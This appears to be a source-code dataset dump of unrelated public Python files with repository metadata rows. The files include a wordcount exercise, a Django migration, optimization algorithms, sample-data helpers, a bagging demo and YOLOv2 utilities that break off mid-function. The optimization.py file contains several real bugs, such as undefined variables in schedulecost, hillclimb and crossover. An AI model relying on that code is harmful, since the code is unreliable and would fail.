fd.write(html_code)
title = ""
# Load parser and driver
theParser = make_parser()
theHandler = myContentHandler()
theParser.setContentHandler(theHandler)
# Ready, set, go!
theParser.parse("http://barrapunto.com/index.rss")
fd.write("</p></body></html>")
print("Parse complete")
fd.close()
| [
"far9508@gmail.com"
] | far9508@gmail.com |
b63d3a9b7793acce97e3ced2c4196729f5895884 | 22e2a4e9392f8a33d18823ef039220ffdb5856d4 | /basic/wordcount.py | 423ee85665a2f24565d5cb65ec9f8daccfa5a920 | [
"Apache-2.0"
] | permissive | inyoka/google-python-exercises | 176961a2b69132d068c2c1731101ed26b9bde98b | 466b532a13d4634144bcdce361b1619a50b0152e | refs/heads/master | 2021-08-24T13:21:01.286377 | 2017-11-21T08:09:09 | 2017-11-21T08:09:09 | 111,513,334 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,166 | py | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
"""Wordcount exercise
Google's Python class
The main() below is already defined and complete. It calls print_words()
and print_top() functions which you write.
1. For the --count flag, implement a print_words(filename) function that counts
how often each word appears in the text and prints:
word1 count1
word2 count2
...
Print the above list in order sorted by word (python will sort punctuation to
come before letters -- that's fine). Store all the words as lowercase,
so 'The' and 'the' count as the same word.
2. For the --topcount flag, implement a print_top(filename) which is similar
to print_words() but which prints just the top 20 most common words sorted
so the most common word is first, then the next most common, and so on.
Use str.split() (no arguments) to split on all whitespace.
Workflow: don't build the whole program at once. Get it to an intermediate
milestone and print your data structure and sys.exit(0).
When that's working, try for the next milestone.
Optional: define a helper function to avoid code duplication inside
print_words() and print_top().
"""
import sys
# +++your code here+++
# Define print_words(filename) and print_top(filename) functions.
# You could write a helper utility function that reads a file
# and builds and returns a word/count dict for it.
# Then print_words() and print_top() can just call the utility function.
###
# This basic command line argument parsing code is provided and
# calls the print_words() and print_top() functions which you must define.
def main():
if len(sys.argv) != 3:
print('usage: ./wordcount.py {--count | --topcount} file')
sys.exit(1)
option = sys.argv[1]
filename = sys.argv[2]
if option == '--count':
print_words(filename)
elif option == '--topcount':
print_top(filename)
else:
print('unknown option: ' + option)
sys.exit(1)
if __name__ == '__main__':
main()
| [
"simonmarkholland@gmail.com"
] | simonmarkholland@gmail.com |
46f4c190ec307f397e873c46ac6abca7c00b6cba | e616ea35ead674ebb4e67cae54768aaaeb7d89c9 | /project/alma/disciplines/migrations/0001_initial.py | cd2f83a805a6561b60a83706fe7cba9576acbc37 | [] | no_license | VWApplications/VWAlmaAPI | 12bb1888533cf987739b0e069737afa6337141e1 | 3a8009b17518384c269dfee3c8fe44cbe2567cc0 | refs/heads/master | 2022-04-02T10:26:49.832202 | 2020-02-12T04:46:31 | 2020-02-12T04:46:31 | 161,098,215 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,490 | py | # Generated by Django 2.1.4 on 2019-09-21 20:17
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import re
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Discipline',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(help_text='Title of discipline', max_length=100, verbose_name='Title')),
('institution', models.CharField(help_text='University or School in which the user is inserted.', max_length=100, verbose_name='Institution')),
('course', models.CharField(help_text='Course that is ministered the discipline', max_length=100, verbose_name='Course')),
('description', models.TextField(help_text='Description of discipline', verbose_name='Description')),
('classroom', models.CharField(default='Class A', help_text='Classroom title of discipline.', max_length=10, validators=[django.core.validators.RegexValidator(re.compile('^Class|^Turma [A-Z]$'), "Enter a valid classroom, the classroom need to be 'Class A-Z'")], verbose_name='Classroom')),
('password', models.CharField(blank=True, help_text='Password to get into the class.', max_length=30, verbose_name='Password')),
('students_limit', models.PositiveIntegerField(default=0, help_text='Students limit to get in the class.', validators=[django.core.validators.MaxValueValidator(60, 'There can be no more than %(limit_value)s students in the class.'), django.core.validators.MinValueValidator(5, 'Must have at least %(limit_value)s students in class.')], verbose_name='Students limit')),
('monitors_limit', models.PositiveIntegerField(default=0, help_text='Monitors limit to insert in the class.', validators=[django.core.validators.MaxValueValidator(5, 'There can be no more than %(limit_value)s monitors in the class.'), django.core.validators.MinValueValidator(0, 'Ensure this value is greater than or equal to %(limit_value)s.')], verbose_name='Monitors limit')),
('is_closed', models.BooleanField(default=False, help_text='Close discipline.', verbose_name='Is closed?')),
('created_at', models.DateTimeField(auto_now_add=True, help_text='Date that the discipline is created.', verbose_name='Created at')),
('updated_at', models.DateTimeField(auto_now=True, help_text='Date that the discipline is updated.', verbose_name='Updated at')),
('monitors', models.ManyToManyField(blank=True, related_name='monitor_classes', to=settings.AUTH_USER_MODEL, verbose_name='Monitors')),
('students', models.ManyToManyField(blank=True, related_name='student_classes', to=settings.AUTH_USER_MODEL, verbose_name='Students')),
('teacher', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='disciplines', related_query_name='discipline', to=settings.AUTH_USER_MODEL, verbose_name='Teacher')),
],
options={
'verbose_name': 'Discipline',
'verbose_name_plural': 'Disciplines',
'ordering': ['title', 'created_at'],
},
),
]
| [
"victorhad@gmail.com"
] | victorhad@gmail.com |
8ac2ee19d3ffee62c28321a1125e6adee92ee362 | 6f15695787ca5fa482c0b95d79b24ad787e75e18 | /optimization.py | 153d71dde50e6e50f06c2ca4dfc4454db3df2e3e | [] | no_license | ingez/Programming_Collective_Intelligence | 04925e6776f3048ec8de452323dae4bf9ff2fd22 | d3062831a838f8546fb3ef05e5d051e5ccd3a480 | refs/heads/master | 2021-01-10T09:47:48.504799 | 2015-12-07T09:23:51 | 2015-12-07T09:23:51 | 44,954,589 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,168 | py | import time
import random
import math
people = [('Seymour', 'BOS'),
('Franny', 'DAL'),
('Zooey', 'CAK'),
('Walt', 'MIA'),
('Buddy', 'ORD'),
('Les', 'OMA')]
#LaFuradia AirPort in NewYork
destination = 'IGA'
flights = { }
for line in file('schedule.txt'):
origin, dest, depart, arrive, price = line.strip().split(', ')
flights.setdefault((origin, dest), [ ])
flights[(origin, dest)].append((depart, arrive, int(price)))
def getminutes(t):
x = time.strptime(t, '%H: %M')
return x[3] * 60 + x[4]
def printschedule(r):
for d in xrange(len(r)/2):
name = people[d][0]
origin = people[d][1]
out = flights[ (origin, destination) ][ r[2 * d] ]
ret = flights[(destination, origin)][ r[2*d + 1]]
print '%10s%10s %5s-%5s $%3s %5s-%5s $%3s' %(name, origin,
out[0], out[1], out[2],
ret[0], ret[1], ret[2])
def schedulecost(sol):
totalprice = 0
latestarrival = 0
earliiestdep = 24 * 60
for x in xrange(len(sol) / 2):
origin = people[d][1]
outbound = flights[ (origin, destination) ][ int(sol[2 * d]) ]
returnf = flights[ (destination, origin) ][ int(sol[2*d + 1]) ]
totalprice += outbound[2]
totalprice += returnf[2]
if latestarrival < getminutes( outbound[1] ) :
latestarrival = getminutes(outbound[1])
if earliiestdep > getminutes( returnf[0] ):
earliiestdep = getminutes( returnf[0] )
totalwait = 0
for d in xrange( len(sol) /2 ):
origin = people[d][1]
outbound = flights[ (origin, destination) ][ int(sol[2 * d]) ]
returnf = flights[ (destination, origin) ][ int(sol[2 * d + 1]) ]
totalwait += latestarrival - getminutes(outbound[1])
totalwait += getminutes(returnf[0]) - earliiestdep
if latestarrival > earliiestdep:
totalprice += 50
return totalprice + totalwait
def randomoptimize(domain, costf):
best = 999999999
bestr = None
for i in xrange(100) :
r = [ random.randint( domain[i][0], domain[i][1] ) for i in xrange( len(domain) ) ]
cost = costf(r)
if cost < best:
best = cost
bestr = r
return r
def hillclimb(domain, costf):
sol = [ random.randint( domain[i][0], domain[i][1] ) for i in xrange(len(domain) ) ]
while 1:
neighbors = [ ]
for j in xrange(len(domain)):
if sol[j] > domain[j][0] :
neighbors.append(sol[0: j] + [sol[j] - 1] + sol[j+1 : ])
if sol[j] < domain[j][1]:
neighbors.append(sol[0: j] + [sol[j] + 1] + sol[j+1: ])
current = costf(sol)
best = current
for x in xrange(len(neighbors)):
if cost < best:
best = cost
sol = neighbors[j]
if best == current:
break
return sol
def annealingoptimize(domain, costf, T = 1000.0, cool = 0.95, step = 1):
vec = [float(random.randint(domain[i][0], domain[i][1])) for i in xrange(len(domain))]
while T > 0.1:
i = random.randint(0, len(domain) - 1)
dir = random.randint(-step, step)
vecb = vec[ : ]
vecb[i] += dir
if vecb[i] < domain[i][0]:
vecb[i] = domain[i][0]
elif vecb[i] > domain[i][1]:
vecb[i] = domain[i][1]
ea = costf(vec)
eb = costf(vecb)
if (eb < ea or random.random() < pow( math.e, -(eb - ea) /T ) ):
vec = vecb
T = T * cool
return vec
def geneticoptimize(domain, costf, popsize = 50, step = 1,
mutprob = 0.2, elite = 0.2, maxiter = 100):
def mutate(vec):
i = random.randint(0, len(domain) - 1)
if random.random() < 0.5 and vec[i] > domain[i][0] :
return vec[0: i] + [vec[i] - step] + vec[i+1 : ]
elif vec[i] < domain[i][1]:
return vec[0: i] + [vec[i] + step] + vec[i+1 : ]
def crossover(c1, c2):
i = random.randint(1, len(domain) - 2)
return r1[0 : i] + r2[i : ]
pop = [ ]
for i in xrange(popsize):
vec = [random.randint(domain[i][0], domain[i][1])
for i in xrange(len(domain))]
pop.append(vec)
topelite = int(elite * popsize)
for i in xrange(maxiter):
scores = [(costf(v), v) for v in pop]
scores.sort()
ranked = [v for (s, v) in scores]
pop = ranked[0 : topelite]
while len(pop) < popsize:
if random.random() < mutprob:
c = random.randint(0, topelite)
pop.append(mutate(ranked[c]))
else:
c1 = random.randint(0, topelite)
c2 = random.randint(0, topelite)
pop.append(crossover(ranked[c1], ranked[c2]))
print scores[0][0]
return scores[0][1]
| [
"hznge@qq.com"
] | hznge@qq.com |
6117d1e662033b69ada4163ef95dad63dd91fca1 | 059c3bb5e0e8552f09768c3442b7af8614ca72f6 | /Lab7/CodingBat/Warmup-1/sum_double.py | 0bfcd81918208702cae91b103672123c1d6e5f38 | [] | no_license | tdinaraa/WebDev | 04ac88369cdf14e199841caf08a90723e73b4ccf | b99bdb93756b6a63b2835c0eee5b8d24309f7e00 | refs/heads/master | 2023-01-22T08:32:06.405670 | 2020-04-22T04:32:53 | 2020-04-22T04:32:53 | 240,984,305 | 0 | 0 | null | 2023-01-07T21:54:04 | 2020-02-16T23:41:57 | null | UTF-8 | Python | false | false | 90 | py | def sum_double(a, b):
sum = a + b
if a == b:
sum = sum * 2
return sum | [
"45028995+tdinaraa@users.noreply.github.com"
] | 45028995+tdinaraa@users.noreply.github.com |
85baa7b9dbc58edbbe2aa259e9295d59cbff831e | c7d98beb689410cbba2c712a01c25863f267b5dc | /scripts/python/experiments/cocktail_party/postprocessing/results_summary_helpers.py | de9dd4f0f44dc5b0a55a88047c2b7567c76adab6 | [] | no_license | ml4ai/hamlet_experiment_py2 | 2b8d5b21e9c3c62bc17409da4971869aaf13f705 | 2d49f797d0ee0baa0447e0965468e7c15e796bb7 | refs/heads/master | 2021-03-27T11:41:43.494446 | 2017-11-06T14:31:18 | 2017-11-06T14:31:18 | 61,496,702 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,207 | py | __author__ = 'clayton'
import collections
import os
import sys
import prettytable
from utilities import util
def append_data_to_dict(d, data_set_name, data_set_LT, data_set_LT_num, value):
# print d
if data_set_name not in d:
d[data_set_name] = collections.OrderedDict()
d[data_set_name][data_set_LT] = collections.OrderedDict()
d[data_set_name][data_set_LT][data_set_LT_num] = value
else:
if data_set_LT not in d[data_set_name]:
d[data_set_name][data_set_LT] = collections.OrderedDict()
d[data_set_name][data_set_LT][data_set_LT_num] = value
else:
d[data_set_name][data_set_LT][data_set_LT_num] = value
def print_dict(d):
for data_set_name, lt_dict in d.iteritems():
for data_set_LT, num_dict in lt_dict.iteritems():
print '{0} {1}:'.format(data_set_name, data_set_LT)
for n, val in num_dict.iteritems():
print ' {0}: {1}'.format(n, val)
def dict_to_prettytable(d, decimal_precision=3):
dfmtr = '{{0:.{0}f}}'.format(decimal_precision)
for data_set_name, lt_dict in d.iteritems():
for data_set_LT, lt_num_dict in lt_dict.iteritems():
header = [ 'Iteration' ] \
+ [ '{0}'.format(key) for key in lt_num_dict.keys() ]
table = prettytable.PrettyTable(header)
iteration_keys = util.OrderedSet()
for value_dict in lt_num_dict.itervalues():
for iter_key in value_dict.iterkeys():
iteration_keys.add(iter_key)
for iter_key in iteration_keys:
row = [ iter_key ]
for value_dict in lt_num_dict.itervalues():
if iter_key in value_dict:
value = value_dict[iter_key]
try:
value = float(value)
value = dfmtr.format(value)
except ValueError:
pass
else:
value = 'Null'
row.append(value)
# print row
table.add_row(row)
print '\n{0} {1}:'.format(data_set_name, data_set_LT)
print table
def display_experiment_summary_tables(data_root, results_file, depth=2):
owd = os.getcwd()
os.chdir(data_root)
all_data = collections.OrderedDict()
for dirName, subdirList, fileList in os.walk('.'):
dircomps = dirName.split('/')
if len(dircomps) == depth+1:
# print 'dirName:', dirName, 'subdirList:', subdirList, 'fileList:', fileList
data_set_name = '/'.join(dircomps[0:-1])
data_set_LT = dircomps[-1].split('_')
# print data_set_name, data_set_LT
if results_file in fileList:
data = collections.OrderedDict()
with open(dirName + '/' + results_file, 'r') as fin:
for line in fin.readlines():
comps = [ x.strip() for x in line.split(' ') ]
if comps[0] != 'iteration':
data[comps[0]] = comps[1]
append_data_to_dict(all_data, data_set_name, data_set_LT[0], data_set_LT[1], data)
# print_dict(all_data)
dict_to_prettytable(all_data)
os.chdir(owd)
'''
collect_files('../results/cocktail_no_learning/h10.0_cp0/',
'F1_score.txt',
depth=2)
'''
'''
collect_files('../results/cocktail/a1b1_nocs_cp0/',
'F1_score.txt',
depth=2)
'''
if __name__ == '__main__':
if len(sys.argv) == 1 or len(sys.argv) > 3:
print 'PRELIMINARY'
print 'usage: python collect_files.py <data_root> <results_file>'
print 'walks figures under data_root and collects and summarizes results_files found'
sys.exit(1)
data_root = '../results/cocktail_no_learning/h10.0_cp0/'
results_file = 'F1_score.txt'
if len(sys.argv) > 1:
data_root = sys.argv[1]
if len(sys.argv) > 2:
results_file = sys.argv[2]
display_experiment_summary_tables(data_root, results_file, depth=2)
| [
"claytonm@email.arizona.edu"
] | claytonm@email.arizona.edu |
49f0bec871aede1626dd9b0823050f24018b7413 | c703b8ac3b5545857f6c95efa2d61eaf7a664021 | /iPERCore/tools/human_digitalizer/deformers/__init__.py | e0d6c7b177b6946f7ec4806e5c0de347eece34a1 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | iPERDance/iPERCore | d29681d229b3098b3517b1abf4f7ea65f579de73 | fcf9a18ffd66bf3fdd3eea4153a3bc4785131848 | refs/heads/main | 2023-07-30T15:04:15.835396 | 2023-04-12T14:21:23 | 2023-04-12T14:21:23 | 313,664,064 | 2,520 | 339 | Apache-2.0 | 2023-05-12T03:26:52 | 2020-11-17T15:36:25 | Python | UTF-8 | Python | false | false | 1,117 | py | # Copyright (c) 2020-2021 impersonator.org authors (Wen Liu and Zhixin Piao). All rights reserved.
import torch
from .sil_deformer import SilhouetteDeformer
from .clothlinks_deformer import ClothSmplLinkDeformer
def run_sil2smpl_offsets(obs_sils, init_smpls, image_size, device=torch.device("cuda:0"),
visualizer=None, visual_poses=None):
"""
Args:
obs_sils (np.ndarray):
init_smpls (np.ndarray):
image_size (int):
device (torch.device):
visualizer (None or Visualizer):
visual_poses (None or np.ndarray):
Returns:
"""
# 1. define Deformer Solver
deform_solver = SilhouetteDeformer(image_size=image_size, device=device)
# 2. format inputs for SilhouetteDeformer.solve()
cam = init_smpls[:, 0:3]
pose = init_smpls[:, 3:-10]
shape = init_smpls[:, -10:]
obs = {
"sil": obs_sils,
"cam": cam,
"pose": pose,
"shape": shape
}
# 3. solve the offsets
offsets = deform_solver.solve(obs, visualizer, visual_poses).cpu().detach().numpy()
return offsets
| [
"liuwen@shanghaitech.edu.cn"
] | liuwen@shanghaitech.edu.cn |
070cbe186db031be4d2e8086716849f26489871d | c3eaf59008279c05e4b7c72169ba3be762f5cce6 | /.venv/lib/python3.7/site-packages/sampledata/mixins/text_mixin.py | 739fae95a255c3a3fe117727dafae7e0ebb21a41 | [] | no_license | bogdanKukliuk/niceTest | b5e53fb9f313e3746dc93650eee9fb8caa74dd3d | 6c4ba8399959e6c0bca6b5a44a4914990f644773 | refs/heads/main | 2023-03-28T08:35:50.493460 | 2021-03-17T21:15:50 | 2021-03-17T21:15:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,537 | py | import random
import string
from ..exceptions import ParameterError
from sampledata import loremipsum
class TextMixin(object):
def word(self):
"""Random text with 1 word."""
return loremipsum.words(1, common=False)
def words(self, min_words=1, max_words=5):
"""Random text with 1 word."""
if min_words > max_words:
raise ParameterError('min_words greater than max_words')
words = random.randint(min_words, max_words)
return loremipsum.words(words, common=False)
def char(self):
"""Random character."""
return random.choice(string.ascii_letters)
def chars(self, min_chars=1, max_chars=5):
"""Random text with 1 word."""
if min_chars > max_chars:
raise ParameterError('min_chars greater than max_chars')
chars = random.randint(min_chars, max_chars)
result = ''
for _ in range(chars):
result += self.char()
return result
def email(self):
"""Random mail address."""
username = loremipsum.words(1, common=False)
domain = loremipsum.words(1, common=False)
termination = random.choice([u'.com', u'.org', u'.net'])
return "{0}@{1}{2}".format(username, domain, termination)
def url(self):
"""Random url."""
protocol = random.choice(["http", "https"])
domain = self.word()
termination = random.choice([u'.com', u'.org', u'.net'])
path = self.word()
return "{0}://{1}{2}/{3}".format(protocol, domain, termination, path)
def sentence(self):
"""Random sentence with text shorter than 255 characters."""
sentence = loremipsum.sentence()
while len(sentence) >= 255:
sentence = loremipsum.sentence()
return sentence
def short_sentence(self):
"""Random sentence with text shorter than 100 characters."""
sentence = loremipsum.sentence()
while len(sentence) >= 100:
sentence = loremipsum.sentence()
return sentence
def long_sentence(self):
"""Random sentence with text longer than 150 characters."""
sentence = loremipsum.sentence()
while len(sentence) <= 150:
sentence = loremipsum.sentence()
return sentence
def paragraph(self):
"""Random text with variable number of words, several sentences."""
return loremipsum.paragraph()
def paragraphs(self, min_paragraphs=1, max_paragraphs=5):
"""Random text with variable number of words, several sentences."""
if min_paragraphs > max_paragraphs:
raise ParameterError('min_paragraphs greater than max_paragraphs')
return "\n\n".join(loremipsum.paragraphs(random.randrange(min_paragraphs, max_paragraphs+1)))
def slug(self, min_words=5, max_words=5):
"""Random slug"""
if min_words > max_words:
raise ParameterError('min_words greater than max_words')
return "-".join([self.word() for x in range(self.int(max_value=max_words, min_value=min_words))])
def tags(self, min_tags=1, max_tags=5, tags_list=None):
if min_tags > max_tags:
raise ParameterError('min_tags greater than max_tags')
tags = []
for i in range(random.randrange(min_tags, max_tags+1)):
if tags_list:
tags.append(tags_list[random.randrange(0, len(tags_list))])
else:
tags.append(self.word())
return ','.join(tags)
| [
"ec2-user@ip-172-31-20-100.us-east-2.compute.internal"
] | ec2-user@ip-172-31-20-100.us-east-2.compute.internal |
4944013970022784952c3f3c979c04980c1ff25f | bc404af610ca8cd55222c5983f15592e284e25c6 | /car/migrations/0004_auto_20200814_1432.py | 34436eb0082a73f4f654ac96b37f53b23d44e02e | [] | no_license | mmgl/DjangoCars | a748cc29f44ab9bc9d093b56835c2760bae902f6 | 841f5c1a038a422115a899d825ddc182e263bc0c | refs/heads/master | 2022-12-06T19:04:54.505371 | 2020-08-23T22:12:33 | 2020-08-23T22:12:33 | 280,905,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | # Generated by Django 3.0.8 on 2020-08-14 11:32
import ckeditor_uploader.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('car', '0003_images'),
]
operations = [
migrations.AlterField(
model_name='car',
name='detail',
field=ckeditor_uploader.fields.RichTextUploadingField(blank=True),
),
]
| [
"muhammedmustafagull@gmail.com"
] | muhammedmustafagull@gmail.com |
259e4f08f748d01aa87961620832501edc5c97b5 | 473c5ab1373df90836a5ce127f7c71209464603b | /Machine learning/Decision Tree/12.6.Bagging.py | 36cd3cff03c4749b86a734d97d994af5049f39d5 | [] | no_license | LN512/hello-liu | 025b7f47e8070fd0290b413a92721829fc30576d | 77c94870af9a0b66d6b0f179a61a760fe0985f6f | refs/heads/master | 2021-06-16T12:52:08.171134 | 2021-01-12T01:25:09 | 2021-01-12T01:25:09 | 89,233,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,988 | py | # /usr/bin/python
# -*- encoding:utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn.linear_model import RidgeCV
from sklearn.ensemble import BaggingRegressor
from sklearn.tree import DecisionTreeRegressor
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures
def f(x):
return 0.5*np.exp(-(x+3) **2) + np.exp(-x**2) + + 0.5*np.exp(-(x-3) ** 2)
if __name__ == "__main__":
np.random.seed(0)
N = 200
x = np.random.rand(N) * 10 - 5 # [-5,5)
x = np.sort(x)
y = f(x) + 0.05*np.random.randn(N)
x.shape = -1, 1
ridge = RidgeCV(alphas=np.logspace(-3, 2, 10), fit_intercept=False)
ridged = Pipeline([('poly', PolynomialFeatures(degree=10)), ('Ridge', ridge)])
bagging_ridged = BaggingRegressor(ridged, n_estimators=100, max_samples=0.3)
dtr = DecisionTreeRegressor(max_depth=5)
regs = [
('DecisionTree Regressor', dtr),
('Ridge Regressor(6 Degree)', ridged),
('Bagging Ridge(6 Degree)', bagging_ridged),
('Bagging DecisionTree Regressor', BaggingRegressor(dtr, n_estimators=100, max_samples=0.3))]
x_test = np.linspace(1.1*x.min(), 1.1*x.max(), 1000)
mpl.rcParams['font.sans-serif'] = [u'SimHei']
mpl.rcParams['axes.unicode_minus'] = False
plt.figure(figsize=(12, 8), facecolor='w')
plt.plot(x, y, 'ro', label=u'训练数据')
plt.plot(x_test, f(x_test), color='k', lw=3.5, label=u'真实值')
clrs = 'bmyg'
for i, (name, reg) in enumerate(regs):
reg.fit(x, y)
y_test = reg.predict(x_test.reshape(-1, 1))
plt.plot(x_test, y_test.ravel(), color=clrs[i], lw=i+1, label=name, zorder=6-i)
plt.legend(loc='upper left')
plt.xlabel('X', fontsize=15)
plt.ylabel('Y', fontsize=15)
plt.title(u'回归曲线拟合', fontsize=21)
plt.ylim((-0.2, 1.2))
plt.tight_layout(2)
plt.grid(True)
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
dd1d15c77bbed78ecbb276388312c71711b89b76 | 20bb1ae805cd796a7c377e55966633441d1d9fd5 | /CodeForces/Problems/887B Cubes for Masha/cubes.py | 7e511bea378f4a51b6295ec6b24c35eb89ef6910 | [] | no_license | nathantheinventor/solved-problems | 1791c9588aefe2ebdc9293eb3d58317346d88e83 | c738e203fa77ae931b0ec613e5a00f9a8f7ff845 | refs/heads/master | 2022-10-27T08:58:23.860159 | 2022-10-13T20:18:43 | 2022-10-13T20:18:43 | 122,110,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | cubes = [input().split() for _ in range(int(input()))]
def canMake(s):
if len(s) == 1:
for cube in cubes:
if s in cube:
return True
return False
elif len(s) == 2:
for i, cube1 in enumerate(cubes):
if s[0] in cube1:
for j, cube2 in enumerate(cubes):
if i != j and s[1] in cube2:
return True
return False
elif len(s) == 3:
for i, cube1 in enumerate(cubes):
if s[0] in cube1:
for j, cube2 in enumerate(cubes):
if i != j and s[1] in cube2:
for k, cube3 in enumerate(cubes):
if i != k and j != k and s[2] in cube3:
return True
return False
if not canMake("1"):
print(0)
else:
for i in range(1, 1000):
if not canMake(str(i)):
print(i - 1)
break | [
"nathantheinventor@gmail.com"
] | nathantheinventor@gmail.com |
07c2f1b1292181ff3cb89e02ba4f326110af2ecc | b9b701d6661af48c19411b355a4d3da51e184d0b | /79-zgz-pytorch-yolo2-master/utils.py | 64aebf3db02515f8bd0b6b61b89f2929046ffa19 | [] | no_license | TzuRen/APDM_REM | 4099adc27dc82280b566408ba3827e8bf8df4634 | 5fbe8202aa5677a1d82302246d0260671681c4f7 | refs/heads/master | 2022-11-03T03:46:59.785270 | 2020-06-15T11:01:19 | 2020-06-15T11:01:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,400 | py | #encoding=utf-8
import sys
import os
import time
import math
import torch
import numpy as np
from PIL import Image, ImageDraw, ImageFont
from torch.autograd import Variable
import struct # get_image_size
import imghdr # get_image_size
def sigmoid(x):
return 1.0/(math.exp(-x)+1.)
def softmax(x):
x = torch.exp(x - torch.max(x))
x = x/x.sum()
return x
def bbox_iou(box1, box2, x1y1x2y2=True):
if x1y1x2y2:
mx = min(box1[0], box2[0])
Mx = max(box1[2], box2[2])
my = min(box1[1], box2[1])
My = max(box1[3], box2[3])
w1 = box1[2] - box1[0]
h1 = box1[3] - box1[1]
w2 = box2[2] - box2[0]
h2 = box2[3] - box2[1]
else:
mx = min(box1[0]-box1[2]/2.0, box2[0]-box2[2]/2.0)
Mx = max(box1[0]+box1[2]/2.0, box2[0]+box2[2]/2.0)
my = min(box1[1]-box1[3]/2.0, box2[1]-box2[3]/2.0)
My = max(box1[1]+box1[3]/2.0, box2[1]+box2[3]/2.0)
w1 = box1[2]
h1 = box1[3]
w2 = box2[2]
h2 = box2[3]
uw = Mx - mx
uh = My - my
cw = w1 + w2 - uw
ch = h1 + h2 - uh
carea = 0
if cw <= 0 or ch <= 0:
return 0.0
area1 = w1 * h1
area2 = w2 * h2
carea = cw * ch
uarea = area1 + area2 - carea
return carea/uarea
def bbox_ious(boxes1, boxes2, x1y1x2y2=True):
if x1y1x2y2:
mx = torch.min(boxes1[0], boxes2[0])
Mx = torch.max(boxes1[2], boxes2[2])
my = torch.min(boxes1[1], boxes2[1])
My = torch.max(boxes1[3], boxes2[3])
w1 = boxes1[2] - boxes1[0]
h1 = boxes1[3] - boxes1[1]
w2 = boxes2[2] - boxes2[0]
h2 = boxes2[3] - boxes2[1]
else:
mx = torch.min(boxes1[0]-boxes1[2]/2.0, boxes2[0]-boxes2[2]/2.0)
Mx = torch.max(boxes1[0]+boxes1[2]/2.0, boxes2[0]+boxes2[2]/2.0)
my = torch.min(boxes1[1]-boxes1[3]/2.0, boxes2[1]-boxes2[3]/2.0)
My = torch.max(boxes1[1]+boxes1[3]/2.0, boxes2[1]+boxes2[3]/2.0)
w1 = boxes1[2]
h1 = boxes1[3]
w2 = boxes2[2]
h2 = boxes2[3]
uw = Mx - mx
uh = My - my
cw = w1 + w2 - uw
ch = h1 + h2 - uh
mask = ((cw <= 0) + (ch <= 0) > 0)
area1 = w1 * h1
area2 = w2 * h2
carea = cw * ch
carea[mask] = 0
uarea = area1 + area2 - carea
return carea/uarea
def nms(boxes, nms_thresh):
if len(boxes) == 0:
return boxes
det_confs = torch.zeros(len(boxes))
for i in range(len(boxes)):
det_confs[i] = 1-boxes[i][4]
_,sortIds = torch.sort(det_confs)
out_boxes = []
for i in range(len(boxes)):
box_i = boxes[sortIds[i]]
if box_i[4] > 0:
out_boxes.append(box_i)
for j in range(i+1, len(boxes)):
box_j = boxes[sortIds[j]]
if bbox_iou(box_i, box_j, x1y1x2y2=False) > nms_thresh:
#print(box_i, box_j, bbox_iou(box_i, box_j, x1y1x2y2=False))
box_j[4] = 0
return out_boxes
def convert2cpu(gpu_matrix):
return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)
def convert2cpu_long(gpu_matrix):
return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)
def get_region_boxes(output, conf_thresh, num_classes, anchors, num_anchors, only_objectness=1, validation=False):
anchor_step = len(anchors)/num_anchors
if output.dim() == 3:
output = output.unsqueeze(0)
batch = output.size(0)
assert(output.size(1) == (5+num_classes)*num_anchors)
h = output.size(2)
w = output.size(3)
t0 = time.time()
all_boxes = []
output = output.view(batch*num_anchors, 5+num_classes, h*w).transpose(0,1).contiguous().view(5+num_classes, batch*num_anchors*h*w)
grid_x = torch.linspace(0, w-1, w).repeat(h,1).repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).cuda()
grid_y = torch.linspace(0, h-1, h).repeat(w,1).t().repeat(batch*num_anchors, 1, 1).view(batch*num_anchors*h*w).cuda()
xs = torch.sigmoid(output[0]) + grid_x
ys = torch.sigmoid(output[1]) + grid_y
anchor_w = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([0]))
anchor_h = torch.Tensor(anchors).view(num_anchors, anchor_step).index_select(1, torch.LongTensor([1]))
anchor_w = anchor_w.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).cuda()
anchor_h = anchor_h.repeat(batch, 1).repeat(1, 1, h*w).view(batch*num_anchors*h*w).cuda()
ws = torch.exp(output[2]) * anchor_w
hs = torch.exp(output[3]) * anchor_h
det_confs = torch.sigmoid(output[4])
cls_confs = torch.nn.Softmax()(Variable(output[5:5+num_classes].transpose(0,1))).data
cls_max_confs, cls_max_ids = torch.max(cls_confs, 1)
cls_max_confs = cls_max_confs.view(-1)
cls_max_ids = cls_max_ids.view(-1)
t1 = time.time()
sz_hw = h*w
sz_hwa = sz_hw*num_anchors
det_confs = convert2cpu(det_confs)
cls_max_confs = convert2cpu(cls_max_confs)
cls_max_ids = convert2cpu_long(cls_max_ids)
xs = convert2cpu(xs)
ys = convert2cpu(ys)
ws = convert2cpu(ws)
hs = convert2cpu(hs)
if validation:
